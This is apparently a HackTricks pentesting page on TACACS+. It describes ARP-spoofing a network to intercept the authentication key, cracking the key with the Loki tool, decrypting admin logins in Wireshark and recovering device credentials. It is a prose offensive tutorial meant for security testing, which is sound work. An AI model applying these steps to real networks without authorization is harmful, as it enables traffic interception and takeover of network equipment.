5.9 KiB
49 - Pentesting TACACS+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Terminal Access Controller Access Control System (TACACS) is a security protocol that provides centralized validation of users who are attempting to gain access to a router or NAS. TACACS+, a more recent version of the original TACACS protocol, provides separate authentication, authorization, and accounting (AAA) services.
PORT STATE SERVICE
49/tcp open tacacs
Default port: 49
Intercept Authentication Key
If an attacker manages to get in the middle between the client and the TACACS server, he can intercept the authentication key in encrypted form and then do a local bruteforce against it. So you both bruteforce the key and you don’t show up in the logs. And if you manage to bruteforce the key, you’ll be able to access the network equipment and decrypt the traffic in Wireshark.
MitM
In order to perform a MitM attack you could use an ARP spoofing attack.
Brute-force Key
Now you need to run Loki. This is a special tool designed to analyze the security of L2/L3 protocols. Its capabilities are just as good as those of the popular Yersinia and it is a serious competitor to it. Loki can also bruteforce TACACS keys. If the key is successfully bruteforced (usually in MD5 encrypted format), we can access the equipment and decrypt the TACACS-encrypted traffic.
sudo loki_gtk.py
You also need to specify the path to the dictionary in order to bruteforce the encrypted key. Be sure to uncheck the Use Bruteforce option, otherwise Loki will bruteforce the password without using the dictionary.
Now we have to wait for an administrator to log into the device through the TACACS server. It is assumed that the network administrator has already logged in, and we, standing in the middle via ARP spoofing, intercept the traffic. And in doing so, the legitimate hosts don’t realize that someone else has interfered with their connection.
Now click the CRACK button and wait for Loki to break the password.
Decrypt Traffic
Great, we managed to unlock the key, now we need to decrypt the TACACS traffic. As I said, Wireshark can handle encrypted TACACS traffic if the key is present.
We see which banner was used.
We find the username of the user admin
As a result, we have the admin:secret1234 credentials, which can be used to access the hardware itself. I think I’ll check their validity.
This is how you can attack TACACS+ and gain access to the control panel of network equipment.
References
- The interception key section was copied from https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.